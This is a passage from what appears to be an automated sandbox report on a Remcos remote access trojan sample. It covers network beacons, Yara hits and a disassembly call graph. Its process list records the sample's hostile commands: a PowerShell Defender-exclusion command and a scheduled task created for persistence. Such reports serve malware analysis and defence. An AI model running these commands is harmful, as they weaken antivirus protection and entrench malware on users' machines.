                      Jul 1, 2024 19:43:48.225577116 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:43:48.232368946 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:43:52.176400900 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:43:52.503951073 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:43:53.206918955 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:43:54.503787041 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:43:57.003794909 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:44:01.910087109 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:44:11.707464933 CEST4971580192.168.2.6178.237.33.50
                      Jul 1, 2024 19:44:18.352758884 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:44:18.355592012 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:44:18.360419989 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:44:49.272547960 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:44:49.277657032 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:44:49.282766104 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:45:20.157531023 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:45:20.160970926 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:45:20.166017056 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:45:50.248716116 CEST29734971294.156.69.93192.168.2.6
                      Jul 1, 2024 19:45:50.252813101 CEST497122973192.168.2.694.156.69.93
                      Jul 1, 2024 19:45:50.257771969 CEST29734971294.156.69.93192.168.2.6

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Jul 1, 2024 19:42:02.210078955 CEST5480153192.168.2.61.1.1.1
                      Jul 1, 2024 19:42:02.219374895 CEST53548011.1.1.1192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jul 1, 2024 19:42:02.210078955 CEST192.168.2.61.1.1.10x772dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jul 1, 2024 19:42:02.219374895 CEST1.1.1.1192.168.2.60x772dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • geoplugin.net

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649715178.237.33.50804896C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      TimestampBytes transferredDirectionData
                      Jul 1, 2024 19:42:02.235013008 CEST71OUTGET /json.gp HTTP/1.1
                      Host: geoplugin.net
                      Cache-Control: no-cache
                      Jul 1, 2024 19:42:02.858299971 CEST1170INHTTP/1.1 200 OK
                      date: Mon, 01 Jul 2024 17:42:02 GMT
                      server: Apache
                      content-length: 962
                      content-type: application/json; charset=utf-8
                      cache-control: public, max-age=300
                      access-control-allow-origin: *
                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:13:41:56
                      Start date:01/07/2024
                      Path:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                      Imagebase:0x50000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:3
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                      Imagebase:0xf30000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0xf30000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
                      Imagebase:0x820000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:9
                      Start time:13:41:58
                      Start date:01/07/2024
                      Path:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                      Imagebase:0x9a0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:10
                      Start time:13:41:58
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Imagebase:0xd90000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 32%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:11
                      Start time:13:41:59
                      Start date:01/07/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff717f30000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"
                      Imagebase:0x820000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:14
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:15
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0x2a0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:16
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0x3a0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:17
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0x5b0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:9.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:9.2%
                        Total number of Nodes:185
                        Total number of Limit Nodes:10
                        execution_graph 36195 ac92c8 36196 ac92d5 36195->36196 36198 ac8b2c 36195->36198 36199 ac8b37 36198->36199 36202 ac8b4c 36199->36202 36201 ac9375 36201->36196 36203 ac8b57 36202->36203 36206 ac8b7c 36203->36206 36205 ac945a 36205->36201 36207 ac8b87 36206->36207 36208 ac8bac CreateWindowExW 36207->36208 36209 ac954d 36208->36209 36209->36205 36210 acdc08 36211 acdc4e GetCurrentProcess 36210->36211 36213 acdc99 36211->36213 36214 acdca0 GetCurrentThread 36211->36214 36213->36214 36215 acdcdd GetCurrentProcess 36214->36215 36217 acdcd6 36214->36217 36216 acdd13 GetCurrentThreadId 36215->36216 36219 acdd6c 36216->36219 36217->36215 36240 ace258 DuplicateHandle 36241 ace2ee 36240->36241 36242 acbd58 36243 acbd67 36242->36243 36245 acbe3f 36242->36245 36246 acbe61 36245->36246 36247 acbe84 36245->36247 36246->36247 36253 acc0e8 36246->36253 36257 acc0d8 36246->36257 36247->36243 36248 acbe7c 36248->36247 36249 acc088 GetModuleHandleW 36248->36249 36250 acc0b5 36249->36250 36250->36243 36254 acc0fc 36253->36254 36256 acc121 36254->36256 36261 acb888 36254->36261 36256->36248 36258 acc0fc 36257->36258 36259 acc121 36258->36259 36260 acb888 LoadLibraryExW 36258->36260 36259->36248 36260->36259 36262 acc2c8 LoadLibraryExW 36261->36262 36264 acc341 36262->36264 36264->36256 36098 49e9a08 36099 49e9a33 36098->36099 36119 49e9408 36099->36119 36101 49e9a6c 36124 49e9418 36101->36124 36104 49e9418 CreateWindowExW 36105 49e9aa8 36104->36105 36106 49e9408 CreateWindowExW 36105->36106 36107 49e9ac6 36106->36107 36108 49e9408 CreateWindowExW 36107->36108 36109 49e9b5c 36108->36109 36110 49e9418 CreateWindowExW 36109->36110 36111 49e9b7a 36110->36111 36112 49e9418 CreateWindowExW 36111->36112 36113 49e9b98 36112->36113 36114 49e9408 CreateWindowExW 36113->36114 36115 49e9bb6 36114->36115 36116 49e9ffa 36115->36116 36128 aca4f0 36115->36128 36133 ac8bac 36115->36133 36120 49e9413 36119->36120 36122 ac8bac CreateWindowExW 36120->36122 36123 aca4f0 CreateWindowExW 36120->36123 36121 49ebbc3 36121->36101 36122->36121 36123->36121 36125 49e9423 36124->36125 36138 49e9824 36125->36138 36127 49e9a8a 36127->36104 36129 aca500 36128->36129 36130 aca7bc 36129->36130 36143 acb9fd 36129->36143 36147 acba28 36129->36147 36130->36116 36134 ac8bb7 36133->36134 36135 aca7bc 36134->36135 36136 acb9fd CreateWindowExW 36134->36136 36137 acba28 CreateWindowExW 36134->36137 36135->36116 36136->36135 36137->36135 36139 49e982f 36138->36139 36140 49eca62 36139->36140 36141 ac8bac CreateWindowExW 36139->36141 36142 aca4f0 CreateWindowExW 36139->36142 36140->36127 36141->36140 36142->36140 36144 acba0d 36143->36144 36151 aca4b4 36144->36151 36146 acbb21 36146->36130 36148 acba43 36147->36148 36149 aca4b4 CreateWindowExW 36148->36149 36150 acbb21 36149->36150 36150->36130 36152 aca4bf 36151->36152 36154 acd2c2 36152->36154 36155 acb910 CreateWindowExW 36152->36155 36154->36146 36155->36154 36156 acdaf0 36158 acdafd 36156->36158 36157 acdb37 36158->36157 36160 acb99c 36158->36160 36161 acb9a7 36160->36161 36163 ace850 36161->36163 36164 acde8c 36161->36164 36163->36163 36165 acde97 36164->36165 36166 ac8bac CreateWindowExW 36165->36166 36167 ace8bf 36166->36167 36171 49e0930 36167->36171 36177 49e0918 36167->36177 36168 ace8f9 36168->36163 36173 49e0a61 36171->36173 36174 49e0961 36171->36174 36172 49e096d 36172->36168 36173->36168 36174->36172 36182 49e1777 36174->36182 36186 49e1788 36174->36186 36179 49e0930 36177->36179 36178 49e096d 36178->36168 36179->36178 36180 49e1788 CreateWindowExW 36179->36180 36181 49e1777 CreateWindowExW 36179->36181 36180->36178 36181->36178 36184 49e17b3 36182->36184 36183 49e1862 36183->36183 36184->36183 36190 49e26a4 36184->36190 36187 49e17b3 36186->36187 36188 49e1862 36187->36188 36189 49e26a4 CreateWindowExW 36187->36189 36189->36188 36191 49e26af CreateWindowExW 36190->36191 36192 49e2646 36190->36192 36194 49e27d4 36191->36194 36192->36183 36220 ac2180 36221 ac218a 36220->36221 36223 ac2280 36220->36223 36224 ac22a5 36223->36224 36228 ac2380 36224->36228 36232 ac2390 36224->36232 36229 ac23b7 36228->36229 36230 ac2494 36229->36230 36236 ac1fb8 36229->36236 36233 ac23b7 36232->36233 36234 ac2494 36233->36234 36235 ac1fb8 CreateActCtxA 36233->36235 36235->36234 36237 ac3420 CreateActCtxA 36236->36237 36239 ac34e3 36237->36239 36265 a3d01c 36266 a3d034 36265->36266 36267 a3d08e 36266->36267 36273 49e28f1 36266->36273 36278 49e0254 36266->36278 36286 49e2859 36266->36286 36291 49e3598 36266->36291 36299 49e2868 36266->36299 36274 49e288e 36273->36274 36277 49e28f7 36273->36277 36275 49e0254 CallWindowProcW 36274->36275 36276 49e28af 36275->36276 36276->36267 36277->36267 36279 49e025f 36278->36279 36280 49e3609 36279->36280 36282 49e35f9 36279->36282 36313 49e037c 36280->36313 36303 49e3730 36282->36303 36308 49e3721 36282->36308 36283 49e3607 36283->36283 36287 49e27fe 36286->36287 36288 49e2867 36286->36288 36287->36267 36289 49e0254 CallWindowProcW 36288->36289 36290 49e28af 36289->36290 36290->36267 36294 49e35d5 36291->36294 36292 49e3609 36293 49e037c CallWindowProcW 36292->36293 36296 49e3607 36293->36296 36294->36292 36295 49e35f9 36294->36295 36297 49e3730 CallWindowProcW 36295->36297 36298 49e3721 CallWindowProcW 36295->36298 36296->36296 36297->36296 36298->36296 36300 49e288e 36299->36300 36301 49e0254 CallWindowProcW 36300->36301 36302 49e28af 36301->36302 36302->36267 36305 49e3744 36303->36305 36304 49e37d0 36304->36283 36317 49e37e8 36305->36317 36320 49e37d9 36305->36320 36309 49e3744 36308->36309 36311 49e37e8 CallWindowProcW 36309->36311 36312 49e37d9 CallWindowProcW 36309->36312 36310 49e37d0 36310->36283 36311->36310 36312->36310 36314 49e0387 36313->36314 36315 49e4cea CallWindowProcW 36314->36315 36316 49e4c99 36314->36316 36315->36316 36316->36283 36318 49e37f9 36317->36318 36323 49e4c20 36317->36323 36318->36304 36321 49e37f9 36320->36321 36322 49e4c20 CallWindowProcW 36320->36322 36321->36304 36322->36321 36324 49e4bbb 36323->36324 36325 49e4c23 36323->36325 36324->36318 36326 49e037c CallWindowProcW 36325->36326 36327 49e4c3a 36326->36327 36327->36318

                        Executed Functions

                        Function 049E99F8 Relevance: 43.2, Strings: 33, Instructions: 1976COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 49e99f8-49e9a59 4 49e9a63-49e9a67 call 49e9408 0->4 6 49e9a6c-49e9aef call 49e9418 * 2 call 49e9408 call 49e9428 4->6 24 49e9af9-49e9afd call 49e9438 6->24 26 49e9b02-49e9c2d call 49e9428 call 49e9438 call 49e9408 call 49e9418 * 2 call 49e9408 call 49e9428 call 49e9438 24->26 62 49e9ce9 26->62 63 49e9c33-49e9c63 26->63 64 49e9cf3-49e9cf7 call 49e9448 62->64 69 49e9c69-49e9c77 63->69 70 49ebb94 63->70 68 49e9cfc-49e9d43 call 49e95f4 * 2 64->68 91 49e9d4d-49e9d51 call 49e9604 68->91 69->70 71 49e9c7d-49e9c94 69->71 74 49ebb99-49ebbb9 70->74 71->70 73 49e9c9a-49e9cd5 71->73 73->70 75 49e9cdb-49e9ce3 73->75 77 49ebbc3-49ebc83 call 49e97d4 call 49e96d4 74->77 483 49ebbbe call ac8bac 74->483 484 49ebbbe call aca4f0 74->484 75->62 75->63 95 49e9d56-49e9d61 91->95 98 49e9d6b-49e9d6f call 49e9614 95->98 101 49e9d74-49e9d7f 98->101 106 49e9d89-49e9d8d call 49e9624 101->106 108 49e9d92-49e9ddd 106->108 115 49e9de4-49e9e19 call 49e9634 108->115 117 49e9e1e-49e9fd6 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 115->117 136 49e9fdb-49e9fea 117->136 138 49e9ff0-49e9ff4 136->138 138->70 139 49e9ffa-49ea060 call 49e3cb4 call 49e9674 138->139 148 49ea06a-49ea085 139->148 149 49ea08b-49ebb93 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9684 * 5 call 49e9634 call 49e9644 call 49e9694 call 49e9654 call 49e9664 call 49e96a4 call 49e96b4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e9684 * 5 call 49e9634 call 49e9644 call 49e9694 call 49e9654 call 49e9664 call 49e96a4 call 49e96b4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9684 call 49e9634 call 49e9644 call 49e9694 call 49e9654 call 49e9664 call 49e96a4 call 49e96b4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96d4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e96e4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e96e4 call 49e96f4 call 49e9634 call 49e9644 call 49e9704 call 49e9654 call 49e9664 call 49e9714 call 49e9634 call 49e9644 call 49e9724 call 49e9654 call 49e9664 call 49e9734 call 49e9744 call 49e9754 call 49e9764 call 49e9684 * 8 call 49e9774 call 49e9784 call 49e9794 call 49e9644 call 49e97a4 call 49e97b4 call 49e97c4 * 4 148->149 483->77 484->77
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$U$g$g$k$k$u$u$u$u
                        • API String ID: 0-796196984
                        • Opcode ID: c48736c4a8c0582654edce6b2d3fdcdd0797c95ee566cc27cf4327ffa60d8df7
                        • Instruction ID: 6d26581b380a9b9d31009722a0baa9f7decec21de0cdfcc17fef81b77af6c625
                        • Opcode Fuzzy Hash: c48736c4a8c0582654edce6b2d3fdcdd0797c95ee566cc27cf4327ffa60d8df7
                        • Instruction Fuzzy Hash: B0232970910B45CFD725EF34C844AA9B7B2FF99304F518AADD1496B360EB71AA85CF40
                        Function 049E9A08 Relevance: 42.0, Strings: 32, Instructions: 2044COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 485 49e9a08-49e9c2d call 49e9408 call 49e9418 * 2 call 49e9408 call 49e9428 call 49e9438 call 49e9428 call 49e9438 call 49e9408 call 49e9418 * 2 call 49e9408 call 49e9428 call 49e9438 547 49e9ce9-49e9ff4 call 49e9448 call 49e95f4 * 2 call 49e9604 call 49e9614 call 49e9624 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 485->547 548 49e9c33-49e9c63 485->548 555 49ebb94-49ebbb9 547->555 624 49e9ffa-49ea085 call 49e3cb4 call 49e9674 547->624 554 49e9c69-49e9c77 548->554 548->555 554->555 556 49e9c7d-49e9c94 554->556 562 49ebbc3-49ebc83 call 49e97d4 call 49e96d4 555->562 968 49ebbbe call ac8bac 555->968 969 49ebbbe call aca4f0 555->969 556->555 558 49e9c9a-49e9cd5 556->558 558->555 560 49e9cdb-49e9ce3 558->560 560->547 560->548 634 49ea08b-49ebb93 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9684 * 5 call 49e9634 call 49e9644 call 49e9694 call 49e9654 call 49e9664 call 49e96a4 call 49e96b4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e9684 * 5 call 49e9634 call 49e9644 call 49e9694 call 49e9654 call 49e9664 call 49e96a4 call 49e96b4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e9684 call 49e9634 call 49e9644 call 49e9694 call 49e9654 call 49e9664 call 49e96a4 call 49e96b4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96d4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e96e4 call 49e9634 call 49e9644 call 49e9654 call 49e9664 call 49e96c4 call 49e96e4 call 49e96f4 call 49e9634 call 49e9644 call 49e9704 call 49e9654 call 49e9664 call 49e9714 call 49e9634 